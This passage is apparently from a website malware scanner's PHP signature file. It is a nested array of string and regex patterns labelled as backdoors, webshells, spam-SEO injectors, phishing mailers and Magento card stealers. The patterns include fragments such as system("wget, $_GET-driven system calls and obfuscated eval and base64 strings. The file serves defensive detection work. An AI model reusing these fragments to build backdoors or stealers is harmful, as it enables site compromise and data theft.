	'>payday loans</a>' => array(STR_WARN, 'php.spam-seo.payday_loans.001', NULL, 1),
	'$url = $urls[rand(0, count($urls)-1)];' => array(STR_CLEARFILE, 'php.spam-seo.redirect_gen.017', NULL, 1),
	'&c=wl_iw&s=' => array(STR_WARN, 'php.redirect.header_location.013', NULL, 1),
	'<?php copy(\'http:' => array(STR_WARN, 'php.backdoor.generic.012', NULL, 1),
	'<META HTTP-EQUIV="refresh" CONTENT="0.1;URL=http://' => array(STR_WARN, 'html.redirect.http-Refresh_gen.003', NULL, 1),
),

'ech' => array(STR_TRIGGER,

	'gagal' => array(STR_TRIGGER,
	),

	'\n";' => array(STR_TRIGGER,
		'echo "' => array(STR_TRIGGER,
			'echo [\'"][\w]+.n[\'"];[\s]*echo php_uname\(\);' => array(REX_WARN, 'php.hacktool.configuration_stealer.010', NULL),
		),
	),

	'echo \'<form action="" method="post"><input type="text" name' => array(STR_TRIGGER,
		'echo "<header class=\"page-header\"><h1 class=\"page-title\">Sorry! Page not found!</h1></header>";' => array(STR_TRIGGER,
		),
	),

	'= file_get_contents(\'http' => array(STR_TRIGGER,
		'file_put_contents($_SERVER[\'DOCUMENT_ROOT\'].\'/' => array(STR_WARN, 'php.backdoor.uploader_gen.012', NULL, 1),
	),

	'$output = $myshell->Execute($cmd);' => array(STR_WARN, 'php.backdoor.generic-webshell.004', NULL, 1),
	'facebook.com/annamLRW' => array(STR_WARN, 'php.hacktool.generic.002', NULL, 1),
	'$__f = implode("", array_map' => array(STR_WARN, 'php.spam-seo.injector_gen.001', NULL, 1),
	'(opera)|(chrome)|' => array(STR_WARN, 'php.spam-seo.injector_gen.002', NULL, 1),
	'$_COOKIE[$__name]' => array(STR_WARN, 'php.spam-seo.injector_gen.003', NULL, 1),
	'1 - file was infected successfully' => array(STR_WARN, 'php.spam-seo.injector_gen.006', NULL, 1),
	'$process_user = posix_getpwuid(pos' => array(STR_WARN, 'php.spam-seo.injector_gen.007', NULL, 1),
	'return $d(substr($c, $a, $b));};$II' => array(STR_WARN, 'php.spam-seo.injector_gen.014', NULL, 1),
	'explode(" ", "98 97 115 101' => array(STR_WARN, 'php.spam-seo.injector_gen.017', NULL, 1),
	' @register_shutdown_function("' => array(STR_WARN, 'php.spam-seo.injector_gen.018', NULL, 1),
	'@register_shutdown_function("__' => array(STR_WARN, 'php.spam-seo.injector_gen.019', NULL, 1),
	'$urls = explode("\n", $_POST[urls]);' => array(STR_WARN, 'php.spam-seo.injector_gen.023', NULL, 1),
	'else if(strpos($tmp, \'YodaoBot\') !== false || strpos($tmp, \'OutfoxBot\') !== false){' => array(STR_WARN, 'php.spam-seo.injector_gen.025', NULL, 1),
	'echo htmlbody($url,$url2,$query' => array(STR_WARN, 'php.spam-seo.injector_gen.026', NULL, 1),
	'$p=str_replace(\'<link rel="canonical" href' => array(STR_WARN, 'php.spam-seo.injector_gen.027', NULL, 1),
	'shadykit.com' => array(STR_WARN, 'php.spam-seo.shadykit_com.001', NULL, 1),
	'$fp = @fsockopen("www.kishuran' => array(STR_WARN, 'php.malware.injector.002', NULL, 1),
	'134217728,150994943,1062518496' => array(STR_WARN, 'php.malware.antibot-check.003', NULL, 1),
),

'file_get_content' => array(STR_TRIGGER,
	
	'file_get_contents($' => array(STR_TRIGGER,
		'@file_get_contents($_' => array(STR_WARN, 'php.backdoor.file_get_contents.005', NULL,1),
		'$str = file_get_contents($url);' => array(STR_WARN, 'php.malware.injector.016', NULL,1),
		'$content2 = @file_get_contents($foc);' => array(STR_WARN, 'php.malware.injector.018', NULL,1),
		'echo file_get_contents($remote_path' => array(STR_WARN, 'php.malware.injector.030', NULL, 1),
	),

	'=\@?file_get_contents\(.http:\/\/' => array(REX_TRIGGER,  
		
		'=file_get_contents(\'http://maps.google.com/maps' => array(STR_WHITE,
			'class Video' => array(STR_WHITE, 
				'\S=file_get_contents\(\'http:\/\/' => array(REX_WARN, 'rex.fgc_url.002', NULL),
			),
		),

		'\S=@file_get_contents\("http:\/\/' => array(REX_WARN, 'rex.fgc_url.003', NULL),
	),

	'.gif' => array(STR_TRIGGER,  
		'file_get_contents\(.\/\S+\.gif.\)' => array(REX_WARN, 'rex.fgc_gif.001', NULL),
	),

	'"User-Agent: MainLink' => array(STR_TRIGGER,
	),

	'"wp-".substr(str_shuffle(str_repeat("abcdefghijklmnopqrstuvwxyz"' => array(STR_TRIGGER,
		'"wp-".substr(str_shuffle(str_repeat("abcdefghijklmnopqrstuvwxyz"' => array(STR_WARN, 'php.malware.injector.003', NULL, 1),
	),

	'= create_function(\'\', file_get_c' => array(STR_WARN, 'php.spam-seo.generic.004', NULL, 1),
	'create_function("", file_get_co' => array(STR_WARN, 'php.backdoor.file_get_contents.003', NULL,1),
	'=@create_function(\'\',@file_get_co' => array(STR_WARN, 'php.backdoor.file_get_contents.002', NULL,1),
	'file_get_contents(str_rot13(' => array(STR_WARN, 'php.backdoor.file_get_contents.007', NULL,1),
	'$newcontent = @file_get_contents( $' => array(STR_WARN, 'php.spam-seo.injector_gen.009', NULL,1),
	'$sOutContent = file_get_contents(' => array(STR_WARN, 'php.malware.generic.046', NULL, 1),
	'file_put_contents($id, file_get_contents("http://' => array(STR_WARN, 'php.dropper.generic.001.01', NULL,1),
	'@touch(dirname($file),$t,$t);' => array(STR_WARN, 'php.malware.touchtimestamp.001', NULL, 1),
	'$fp = fopen("wo.php", "w+");' => array(STR_WARN, 'php.malware.generic.053', NULL, 1),
	'/tds/?ip=' => array(STR_WARN, 'php.malware.tds-url.002', NULL, 1),
	'if(stristr($buffer,"##".$page."|")){$entry' => array(STR_WARN, 'php.spam-seo.block_injector_gen.001', NULL,1),
),

'style' => array(STR_TRIGGER,

	'position:' => array(STR_TRIGGER,

		'f.setAttribute(\'src\',' => array(STR_TRIGGER,
			'function iframer(){' => array(STR_WARN, 'js.spam-seo.injector.043', NULL,1),
		),

		'<div style="position:absolute;top:-' => array(STR_TRIGGER,
		),

		'echo "<span style=\"position: absolute; left: -' => array(STR_WARN, 'php.spam-seo.hidden-style.002', NULL, 1),
		'relative;height:0px;width:0px;overflow:hidden' => array(STR_WARN,'html.spam-seo.hidden-div.009', NULL, 1),
		'absolute; left: -11' => array(STR_WARN,'html.spam-seo.hidden-div.008', NULL, 1),
		'<p style="overflow: auto; position: fixed; height: 0pt; width: 0pt">' => array(STR_WARN, 'html.spam-seo.hidden-paragraph.001', NULL,1),
		'\" style=\"position:absolute; left:-' => array(STR_WARN,'php.spam-seo.hidden-style.001', NULL, 1),
		'_links = array("<div style=\"position: absolute; left:-100%; top:-100%;\"><a href' => array(STR_WARN, 'php.spam-seo.injector_gen.031', NULL,1),
	),

	'display:' => array(STR_TRIGGER,
		'</A> <A style="display:none;" HREF="http://' => array(STR_WARN,'html.spam-seo.hidden-link.001', NULL, 1),
		'echo \'<div style="display:none"><a href="http' => array(STR_WARN, 'php.spam-seo.injector_gen.039', NULL,1),
	),

	'<div style="left:-6' => array(STR_WARN, 'html.spam-seo.hidden-div.003', NULL, 1),
	'<div id="medcare" style="top:-' => array(STR_WARN, 'html.spam-seo.hidden-div.004', NULL,1),
	'div id=linkbyme' => array(STR_WARN, 'html.spam-seo.hidden-div.006', NULL,1),
	'style="\64\69\73\70\6c\61\79:\6e\6f\6e\65"' => array(STR_WARN, 'html.malware.css-behavior.001', NULL,1),
	').style.display=\'none\';document.body.appendChild(' => array(STR_WARN, 'js.malware.hidden-iframe.003', NULL,1),
	'if(document.getElementById("links")!=null){document.getElementById("links").style.visibility="hidden";document.getElementById("links").style.display="none";}' => array(STR_WARN, 'js.spam-seo.hidden-style.008', NULL,1),
	'class="pill cialis"' => array(STR_WARN, 'html.spam-seo.generic.007',NULL, 1),
	'style="font:0px Trebuchet MS;color:#333;">' => array(STR_WARN,'html.spam-seo.hidden-div.011', NULL, 1),
	'"dispLAy : NOnE;' => array(STR_WARN, 'html.spam-seo.hidden-style.004', NULL, 1),
 	'id="hide"><a href="http://' => array(STR_WARN, 'html.spam-seo.spam-links.001', NULL,1),
),

'mail' => array(STR_TRIGGER,

	'mail(' => array(STR_TRIGGER,
		'Kartenummer' => array(STR_WARN, 'php.phishing.mailer.004', NULL, 1),
		'cgi-bin/webscr?cmd=_login-run")' => array(STR_WARN, 'php.phishing.mailer.005', NULL, 1),
		'.$_POST[\'cvv2_number\']' => array(STR_WARN, 'php.phishing.mailer.006', NULL, 1),
		'mail(base64_decode(' => array(STR_WARN, 'php.mailer.generic.022', NULL, 1),
		'if ($_REQUEST[\'access\'] != \'let_me_in\') {' => array(STR_CLEARFILE, 'php.mailer.generic.026', NULL),
	),

	'$passwd' => array(STR_TRIGGER,
		'baja' => array(STR_TRIGGER,
		),
	),

	'gmail-smtp-in.l.google.com,google' => array(STR_TRIGGER,
		'$data = json_decode(base64_decode(str_replace(\' \', \'+\', $_REQUEST[\'data\'])), true);' => array(STR_WARN, 'php.mailer.generic.019', NULL, 1),
	),

	'// Start Login Protection' => array(STR_TRIGGER,
		 '// End Login Protection' => array(STR_WARN, 'php.backdoor.joomla_steal.001', NULL, 1),
	),

	'function init_spam_gadget' => array(STR_WARN, 'php.mailer.POST.003', NULL,1),
	'$headers .= "X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441' => array(STR_WARN, 'php.mailer.generic.013', NULL, 1),
	'$dados.="<b>Safe Mode:</b>{$phpinfo' => array(STR_WARN, 'php.mailer.phpinfo.001', NULL,1),
	'$return = mail($email_polucha,$tema_pisma,$telo_pisma,$headers);' => array(STR_WARN, 'php.mailer.generic.003', NULL,1),
	'$GUT = mail($empfaenger, $betreff, $nachricht, $headers);' => array(STR_WARN, 'php.mailer.POST.004.10', NULL,1),
	'ini_set(\'mail.add_x_header\',\'off\');' => array(STR_WARN, 'php.mailer.POST.018', NULL,1),
	'Uncle fucker\'s Backdoor' => array(STR_WARN, 'php.backdoor.generic.007', NULL, 1),
	'../loge.php?cmd=_login-submit&dispatch' => array(STR_WARN, 'html.phishing.paypal.005', NULL, 1),
	'href="myca/acctmgmt/us/myaccountsummary.do?request_type=authreg' => array(STR_WARN, 'html.phishing.americanexpress.005', NULL, 1),
),

'inclu' => array(STR_TRIGGER,

	'include(' => array(STR_TRIGGER,
		'@include(\'php5.php\');' => array(STR_WARN, 'php.malware.injector_gen.022', NULL,1),
		'if(!isset($db)) @include' => array(STR_WARN, 'php.malware.include.018', NULL, 1),
		'include( dirname( __FILE__ ) . \'/wp-blog-footer.php\' );' => array(STR_WARN, 'php.malware.include.008', NULL, 1),
		'if(!class_exists(\'FbiClient\')) { if(@file_exists' => array(STR_WARN, 'php.malware.include.009', NULL, 1),
		'include(\'./wp-includes/' => array(STR_WARN, 'php.malware.include.011', NULL, 1),
		'include(ABSPATH."/wp-includes/' => array(STR_WARN, 'php.malware.include.021', NULL, 1),
	),

	'include_onc' => array(STR_TRIGGER,

		'return $included === $count;' => array(STR_TRIGGER,
			'if (file_exists(\'Config\' . $arg . \'.php\')) {' => array(STR_WARN, 'php.malware.include.024', NULL, 1),
		),

		'@include_once[\s(\'"]+\/home\/' => array(REX_WARN, 'php.malware.include.005', NULL),
	),

	'@include' => array(STR_TRIGGER,

		'@include "' => array(STR_TRIGGER,
		),

	),

	'*/include' => array(STR_TRIGGER,
		'*/include ' => array(STR_WARN, 'php.malware.include.012', NULL, 1),
	),

	'unlink(ABSPATH' => array(STR_TRIGGER,
		'$wpdb->query("DROP TABLE ".$wpdb->prefix."' => array(STR_WARN,'php.malware.db_drop_gen.001', NULL, 1), 
	),

	'php include \'fonts/font.ttf\'; get_header();' => array(STR_WARN, 'php.malware.include.010', NULL,1),
	'<!--#include file="images' => array(STR_WARN, 'vb.malware.include.001', NULL,1),
	'include(_once)?\s*\(?\s*[\'"][^\'"]+(jpg|png|gif|bmp|ico|avi|mov|mpg|mpeg|jpeg)[\'"]\s*\)?' => array(REX_WARN, 'rex.include_image.001', NULL),
	'(\$\w+)\s*=\s*[^;]+\$_SERVER..HTTP_USER_AGENT[^>]+if\s*\(strpos\(\1,\s*.bot[^\}]+include' => array(REX_WARN, 'rex.include_ifbot.001', NULL),
	'include\(\$_(GET|POST|COOKIE)[^;]+\]\s*\);' => array(REX_WARN, 'rex.include_requests.001', NULL),
	'include_once[\s\(]*[\'"]\/[\w]+\/[\w]+\/[\w\/]+[\'"][\s\)]*;' => array(REX_WARN, 'rex.include_abs_path.003', NULL),
),

'require' => array(STR_TRIGGER,

	'require_once(' => array(STR_TRIGGER,

		'@package WordPress' => array(STR_TRIGGER,
			'require_once(ABSPATH.\'wp-content/plugins' => array(STR_WARN, 'php.malware.require_plugin.001', NULL, 1),
		),

		'require_once[\s\(]*[\'"]\/[\w]+\/[\w]+\/[\w\/]+[\'"][\s\)]*;' => array(REX_WARN, 'rex.include_abs_path.002', NULL),        
	),

	'@require(_once)?\(' => array(REX_TRIGGER,  
		'@require\([^ ;]*\/\w+\.css["\']\);' => array(REX_WARN, 'rex.require_css.001', NULL),  
		'@require_once\(\S+\/\S+\/\S+.pdf\S\);' => array(REX_WARN, 'rex.require_once_pdf.001', NULL),
		'@require\(dirname\(__FILE__\)\.[\'"]\/[-_\w]+\.php[\'"]\);' => array(REX_WARN, 'rex.require_php_constant_path.001', NULL),
		'@require_once("view");' => array(STR_WARN, 'php.spam-seo.generic.013', NULL, 1),
	),  

	'\* Front to the WordPress application\.' => array(REX_TRIGGER,
		'_wejns_wp_whitespace_fix' => array(STR_WHITE,
			'JPRE_SCRIPT_FILENAME\'] = $_SERVER[\'SCRIPT_FILENAME' => array(STR_WHITE,
				'<\?(php)?\s+([\w\$\@]|\/\/)' => array(REX_WARN, 'rex.modified_wp_index.001', NULL),
			),
		),
	),

	'require_once \'conf.php' => array(STR_TRIGGER,
		'yandex.ru' => array(STR_WARN, 'php.spam-seo.Autodor_Wmsn.006', NULL, 1),
	),

	'require(\'./wp-content/' => array(STR_TRIGGER,
		'require(\'./wp-content/' => array(STR_WARN, 'php.spam-seo.require_wp_content.001.02', NULL, 1),
	),

	'<META HTTP-EQUIV="Refresh" CONTENT="5;URL=<?php echo' => array(STR_TRIGGER,
	),

	' require(?:_once)?\s*?\(\s*?\$_SERVER\[\'DOCUMENT_ROOT\'\]\s*?\.[^;]+?\/image[^;]+?\.php' => array(REX_WARN, 'rex.require_image_folder.001', NULL),
	'require(_once)?\([^\s;]+\.(jpg|png|gif|bmp|ico|avi|mov|mpg|mpeg|jpeg|incs|svg).\)' => array(REX_WARN, 'php.malware.require_image.001', NULL),
	'\@?require(_once)\s*\(\s*[\'"]\/var\/www\/\w+' => array(REX_WARN, 'rex.require_abs_path.001', NULL),
	'.dba\';' => array(STR_WARN, 'php.malware.include.017', NULL, 1),
	'require("setupconfig/install.php");' => array(STR_WARN, 'php.spam-seo.doorway-gen.050', NULL, 1),
	'.cbu\');' => array(STR_WARN, 'php.malware.generic.052', NULL,1),
),

'POST[' => array(STR_TRIGGER,

	'preg_replace' => array(STR_TRIGGER,
	),

	'exec' => array(STR_TRIGGER,
		'isset($_POST[\'req\'' => array(STR_WARN, 'php.backdoor.generic.045.05', NULL, 1),
	),

	'fwrite' => array(STR_TRIGGER,
	),

	'die();}' => array(STR_TRIGGER,
		'if($_POST["key"]=="' => array(STR_WARN, 'php.backdoor.generic.057', NULL, 1),
	),

	'base64_decode(strtr($_POST["' => array(STR_TRIGGER,
		'file_put_contents' => array(STR_WARN, 'php.backdoor.cli_upload.001.02', NULL, 1),
	),

	'@$_POST[\'php\'];' => array(STR_WARN, 'php.backdoor.eval_POST.008.004', NULL,1),
	'$_POST[\'path\'].$_FILES[\'file\'][' => array(STR_WARN, 'php.backdoor.uploader.001', NULL,1),
	'fopen($_POST[\'file\'],\'w' => array(STR_WARN, 'php.backdoor.uploader.016', NULL,1),
	'.@$_($_POST' => array(STR_WARN, 'php.backdoor.generic.006', NULL,1),
	'$message = $_POST["body"];' => array(STR_WARN, 'php.mailer.POST.004', NULL,1),
	'$message = stripslashes($_POST["body' => array(STR_WARN, 'php.mailer.POST.004.02', NULL,1),
	'mail = isset ( $_POST [ \'mail\' ] ) ? trim ( $_POST [ \'mail\' ] ) : NULL;' => array(STR_WARN, 'php.mailer.generic.006', NULL,1),
	'file_put_contents($name,base64_decode($_POST[' => array(STR_WARN, 'php.malware.injector.012', NULL,1),
	'$_POST[\'random_mail\'];' => array(STR_WARN, 'php.mailer.generic.012', NULL, 1),
	"\xbe\xac\xac\xba\xad\xab"  => array(STR_WARN, 'php.backdoor.assert_xor.001', NULL, 1),
	'$_COOKIE[\'WP_FLV_EMAIL_CONFIRMED\'' => array(STR_WARN, 'php.injected.tampered_wp_core_fake_bruteforce_protection.001', NULL, 1),
	'<h1>Archive Unzipper' => array(STR_WARN, 'php.hacktool.packer.002', NULL, 1),
	'HeaDeR(' => array(STR_WARN, 'php.backdoor.generic.047', NULL, 1),
	'create_function("", $php)' => array(STR_WARN, 'php.backdoor.create_function.001', NULL, 1),
	', \'a+\'); fwrite($f, $_POST[' => array(STR_WARN, 'php.malware.dropper.002', NULL,1),
),

'google' => array(STR_TRIGGER,
	'!preg_match(\'/google|slurp|bot|crawl|spider' => array(STR_WARN, 'php.malware.UA_check.002.02', NULL, 1),
	'google|adsbot|adbot|mediapartners' => array(STR_WARN, 'php.malware.UA_check.006', NULL, 1),
	'Or InStr(REFERER,"google") > 0 Or InStr(REFERER,"soso.com' => array(STR_WARN, 'asp.spam-seo.injector_gen.001', NULL,1),
	'(uastr.IndexOf("google") > -1) || (uastr.IndexOf("baidu")' => array(STR_WARN, 'asp.spam-seo.injector_gen.004', NULL,1),
	'Response.Redirect(jump)' => array(STR_WARN, 'asp.spam-seo.redirect.006', NULL, 1),
	'var targetdestination="https://drive.google.com' => array(STR_WARN, 'js.phishing.gmail.001', NULL,1),
	'window.location="https://drive.google.com/#my-drive";' => array(STR_WARN, 'js.phishing.gmail.001.02', NULL,1),
	'echo \'google-site-verification: google\'' => array(STR_WARN, 'php.spam-seo.google_verification.002', NULL, 1),
	'<!-- КОД САЙТА ДЛЯ БОТА -->' => array(STR_WARN, 'php.redirect.header_location.010', NULL, 1),
	'if (eregi("google", $agent)) { header' => array(STR_WARN, 'php.spam-seo.header_location.007', NULL, 1),
	'if instr(rUrl,"google") or instr(rUrl,"yahoo") or instr(rUrl,"bing") then' => array(STR_WARN, 'vb.spam-seo.redirect.001', NULL, 1),
	'"googlebot","baiduspider","sogou","yahoo' => array(STR_WARN, 'php.spam-seo.redirect.006', NULL, 1),
	'if (fromse()&&isindex()){' => array(STR_WARN,'php.spam-seo.redirect.028', NULL, 1),
),

'curl' => array(STR_TRIGGER,

	'$output = curl_exec($ch);' => array(STR_TRIGGER,
		'CURLOPT_URL, "http' => array(STR_TRIGGER,
		),
	),

	'$file_contents = curl_exec($ch);' => array(STR_TRIGGER,
		'@package WordPress' => array(STR_TRIGGER, //restricting this sig to core WP files where it should NOT be by PG
		),
	),

	'if(preg_match(\'/Google Web Preview|bot|spider|wget/i\',$_SERVER[\'HTTP_USER_AGENT\'])){' => array(STR_TRIGGER,
		 'if(preg_match(\'/Google Web Preview|bot|spider|wget/i\',$_SERVER[\'HTTP_USER_AGENT\'])){' => array(STR_WARN, 'php.malware.generic.045', NULL,1),
	),

	'](\'curl_' => array(STR_WARN, 'php.backdoor.curl.005', NULL,1),
	'$newcontent = @curl_exec($rend); @' => array(STR_WARN, 'php.spam-seo.injector_gen.010', NULL,1),
	'$ids = explode("-",$_GET[\'p\']);' => array(STR_WARN, 'php.spam-seo.injector_gen.028', NULL, 1),
	'bbb_get($bbb_url);' => array(STR_WARN, 'php.spam-seo.injector_gen.022', NULL,1),
	'unlink($dir.\'/wp-feed.php\');' => array(STR_WARN, 'php.backdoor.uploader.004', NULL, 1),
	'(java)|(windows 95)|(windows 98)' => array(STR_WARN, 'php.dropper.hosts.001', NULL, 1),
	'uggc://' => array(STR_WARN, 'php.malware.str_rot13_url.001', NULL, 1),
	'3639549953,3639558142' => array(STR_WARN, 'php.malware.antibot-check.002', NULL, 1),
	'curl_exec($ch); echo $check; if($ult) {echo $ult;} else {echo \'error' => array(STR_WARN, 'php.backdoor.curl.003', NULL, 1),
	'multiRequest($urls, $options,$oneoptions);' => array(STR_WARN, 'php.backdoor.curl.004', NULL, 1),
	'"\/index\/\?[\d]{10}' => array(REX_WARN, 'php.spam-seo.crypper.003', NULL),
),

'<?php' => array(STR_TRIGGER,  

	'eporting(' => array(STR_TRIGGER, 
	),

	'[ \t]{150,}<\?php' => array(REX_TRIGGER, 
		'\n[ \t]{150,}<\?php' => array(REX_WARN, 'rex.spaced_code.002', NULL),
		'^[ \t]{150,}<\?php' => array(REX_WARN, 'rex.spaced_code.002.02', NULL),
	),

	'Visbot' => array(STR_TRIGGER,
		'../app/Mage.php' => array(STR_WARN, 'php.malware.magento-cc-stealer.019', NULL, 1),
	),

	'\([\'"]{2},' => array(REX_TRIGGER,
		'\$[\w]+[\s]*=[\s]*([\w]+[\s]*\.|\'[^\']+?\'[\s]*\.)[^;]+?([\w]+[\s]*[\|&]|\'[\s]*[\|&])[^;]+;[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\([\'"]{2},[\s]*\$[\w]+\);' => array(REX_WARN, 'rex.undefined_const_concatenation.001', NULL),
	),

	'ob_start();' => array(STR_TRIGGER,
	),

	'function loadini($path) {' => array(STR_TRIGGER, 
		'if ($just_value)  $currentkey = trim(substr($currentkey, strlen($key), $endpos-strlen($key)));' => array(STR_WARN,'php.malware.component.002', NULL, 1),
	),  

	'\$[\w]+[\s]*=[\s]*\$[\w_-]+\([\'"][\w_-]+[\'"][\s]*\.[\s]*#[\w_-]+[\s]*\.[\s]*[\'"][\w_-]+[\'"][\s]*\.[\s]*#[\w_-]+' => array(REX_WARN, 'rex.string_comment_join.001', NULL),
	'(\$\w{2,6}(\{|\[)[0-9]+(\}|\])\.){10,}' => array(REX_WARN, 'rex.string_rearrangement.001', NULL),
	'if (al_ki_shell' => array(STR_WARN, 'php.backdoor.db_shell.003', NULL, 1),
	'batckup.tar.gz' => array(STR_WARN, 'php.hacktool.batckup.001', NULL, 1),
	'/\'._SAPE_USER.\'/' => array(STR_WARN, 'php.hacktool.SAPE.001.03', NULL, 1),
),

'<titl' => array(STR_TRIGGER,
	'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd?' => array(STR_WARN, 'html.spam-seo.pharma-site.001', NULL, 1),
	'<title>[\s]*[Hh][\s]*[Aa@][\s]*([Cc])?[\s]*[Kk][\s]*[Ee3][\s]*[Dd]' => array(REX_WARN, 'rex.defaced.hacked.001', NULL),
),

'FILE' => array(STR_TRIGGER,

	'// PhpConcept Library - Zip Module' => array(STR_TRIGGER,
	),

	'unlink(__FILE__)' => array(STR_TRIGGER,
		'touch(' => array(STR_TRIGGER,
		),
	),

	'<script>alert(\'' => array(STR_TRIGGER,
		'move_uploaded_file($_FILES[\'uploads\'][\'tmp_name' => array(STR_TRIGGER,
			'<b>Uploaded !!!</b>' => array(STR_WARN, 'php.backdoor.uploader_gen.007', NULL, 1),
		),
	),

	'$_FILE(stripslashes($_' => array(STR_WARN, 'php.backdoor.request.001', NULL,1),
	'$_FILES[\'message\'][\'name\']' => array(STR_WARN, 'php.backdoor.uploader.017', NULL,1),
	'<?php @copy($_FILES[file][tmp_nam' => array(STR_WARN, 'php.backdoor.uploader.002.02', NULL,1),
	'GIF89a u<?php' => array(STR_WARN, 'php.backdoor.uploader.002', NULL, 1),
	'vbspiders.com' => array(STR_WARN, 'php.backdoor.vbspiders.001', NULL, 1),
	'if(move_uploaded_file($tmpname,$file_path)){' => array(STR_WARN, 'php.backdoor.uploader.025', NULL,1),
	'echo "File ".$_GET[\'file_name\'].\' unzip successfully.\';' => array(STR_WARN, 'php.hacktool.packer.001', NULL, 1),
),

'<' => array(STR_TRIGGER,
	'<%' => array(STR_TRIGGER,

		'xecute' => array(STR_TRIGGER,
		),

		'<script runat="server"' => array(STR_TRIGGER,
		),

		'request("' => array(STR_TRIGGER,
			'getHTTPPage=bytesToBSTR' => array(STR_WARN, 'asp.backdoor.generic.001', NULL,1),
		),

		'<%eval Request(' => array(STR_WARN, 'asp.backdoor.eval_Request.005', NULL,1),
	),
),

'* Magento' => array(STR_TRIGGER,

	'class Mage_Checkout_Model_Type' => array(STR_TRIGGER,
	),

	'mail(' => array(STR_TRIGGER,
		'.$password' => array(STR_WARN, 'php.malware.magento-login-stealer.007.03', NULL, 1),
	),

	'class Mage_Api2_Model_Auth' => array(STR_TRIGGER,
	),

	'move_uploaded_file($_FILES["fileToUpload"]' => array(STR_WARN, 'php.backdoor.magento-uploader.001', NULL, 1),
	'name="fileToUpload" id="fileToUpload"' => array(STR_WARN, 'php.backdoor.magento-uploader.002', NULL, 1),
	'/js/conf.js"' => array(STR_WARN, 'php.malware.magento-cc-stealer.030', NULL, 1),
	'file_put_contents($ajax,base64_encode' => array(STR_WARN, 'php.malware.magento-cc-stealer.034', NULL, 1),
),

'preg_replace(' => array(STR_TRIGGER,  
	'preg_replace\(\s*[\'"]\/[a-zA-Z0-9][a-zA-Z0-9=]*\/e[\'"]' => array(REX_WARN, 'rex.preg_replace.003', NULL),
	'\w=\'(.)\w\1\'\.substr.\$\w{3}\,\d+,1.;' => array(REX_WARN, 'rex.preg_replace.004', NULL),
	'@preg_replace\([^;]+,\$_REQUEST[^;]+error.\);' => array(REX_WARN, 'rex.preg_replace.005', NULL),
	'@preg_replace("\x' => array(STR_WARN, 'php.backdoor.pregreplace.005', NULL,1),
	'@preg_replace("\'.str2hexoct(\'@(.+)@' => array(STR_WARN, 'php.backdoor.generic-webshell.005', NULL,1),
	'= preg_replace("~<body[^>]*>~' => array(STR_WARN, 'php.spam-seo.b_call.001', NULL,1),
	'ob_start("b_call")' => array(STR_WARN, 'php.spam-seo.b_call.001.02', NULL,1),
),

'system' => array(STR_TRIGGER,
	'{system($_GET["' => array(STR_WARN, 'php.backdoor.eval_REQUEST_gen.001', NULL,1),
	'system("$_GET' => array(STR_WARN, 'php.backdoor.system.002', NULL,1),
	'system("wget' => array(STR_WARN, 'php.backdoor.system_shell.001.02', NULL,1),
	'system(base64_decode' => array(STR_WARN, 'php.backdoor.system.006', NULL,1),
	'$bad_zones = array(".ru", ".su", ".ua", ".kz", ".by",' => array(STR_WARN, 'php.hacktool.phonehome.001', NULL, 1),
	'execute("ls' => array(STR_WARN, 'php.backdoor.generic-webshell.003', NULL, 1),
	'//login to the bot' => array(STR_WARN, 'php.hacktool.ircbot.001', NULL, 1),
	'#  ShellBOT by: ' => array(STR_WARN, 'pl.backdoor.shellbot.001', NULL, 1),
	'system($_' => array(STR_WARN, 'php.backdoor.system.004', NULL,1),
),

'\1' => array(STR_TRIGGER,
	'\141\163\145\066\064\137\144\145' => array(STR_WARN, 'php.backdoor.eval_gen.001.02', NULL,1),
	'\147\172\165\156\143\157\155\160\162\145' => array(STR_WARN, 'php.malware.gzuncompress.002', NULL, 1),
	'\160\162\145\147\137\162' => array(STR_WARN, 'php.backdoor.pregreplace.006.01', NULL,1),
	'\57\56\52\57\145' => array(STR_WARN, 'php.backdoor.pregreplace.012.03', NULL,1),
	'\137\162\145\160\154\141\143\145' => array(STR_WARN, 'php.malware.obfuscated.001.02', NULL,1),
	'\050b\141\163\145\066\064\137' => array(STR_WARN, 'php.malware.base64.001', NULL,1),
	'"\110\124\124\120' => array(STR_WARN, 'php.malware.obfuscated.001', NULL,1),
	'~"\217\236\234\224"' => array(STR_WARN, 'php.malware.pack.002', NULL, 1),
	'; @error_reporting(0); $zend_framework(' => array(STR_WARN, 'php.backdoor.pregreplace.011', NULL,1),
),

'\'.\'' => array(STR_TRIGGER,

	'rand' => array(STR_TRIGGER,

		'chooseRandomBrowserAndOS' => array(STR_TRIGGER,
			'function chooseRandomBrowserAndOS(' => array(STR_WARN, 'php.hacktool.random_ua_creator.001', NULL, 1),
		),

		'$linux_proc[array_rand($linux_proc, 1)]' => array(STR_WARN, 'php.hacktool.random_ua_creator.002', NULL, 1),
	),

	'$_\'.\'PO\'.\'ST[\'' => array(STR_WARN, 'php.backdoor.eval_POST.008.005', NULL,1),
	'\'str_r\'.\'o' => array(STR_WARN, 'php.backdoor.str_rot13.002', NULL,1),
	'\'p(\'\.\'\s)?r[preglac_]{0,13}[\s]*\'[\s]*\.[\s]*[\'][preglac_\'\.\s]{2}' => array(REX_WARN, 'php.backdoor.pregreplace.001', NULL),
	'\'ev\'.\'al(' => array(STR_WARN, 'php.backdoor.eval_gen.004.02', NULL,1),
	'\'e\'.\'va\'.\'l' => array(STR_WARN, 'php.backdoor.eval_gen.004.03', NULL,1),
	'\'ev\'.\'a\'.\'l' => array(STR_WARN, 'php.backdoor.eval_gen.004.04', NULL,1),
	'\'e\'.\'v\'.\'a\'.\'l' => array(STR_WARN, 'php.backdoor.eval_gen.004.05', NULL,1),
	'\'ba\'.\'se6\'.\'4_de' => array(STR_WARN, 'php.malware.base64.018', NULL,1),
	'se\'.\'64\'.\'_de' => array(STR_WARN, 'php.malware.base64.021', NULL,1),
	'.\'\'.\'\'.\'\'.' => array(STR_WARN, 'php.malware.obfuscated.005', NULL, 1),
	'ZXZhbChnemluZmxhdGUoYmFzZTY0X2Rl' => array(STR_WARN, 'php.malware.base64.011', NULL,1),
),

'$_SERVER' => array(STR_TRIGGER,

	'HTTP_USER_AGENT' => array(STR_TRIGGER,
		'$userAgents = array("Google",' => array(STR_WARN, 'php.malware.UA_check.008', NULL, 1),
	),

	'role\' => \'administrator' => array(STR_TRIGGER,  
		'wp_set_current_user($user_id, $user_login);' => array(STR_WARN,'php.backdoor.wp-admin_bypass.001', NULL, 1),
	),

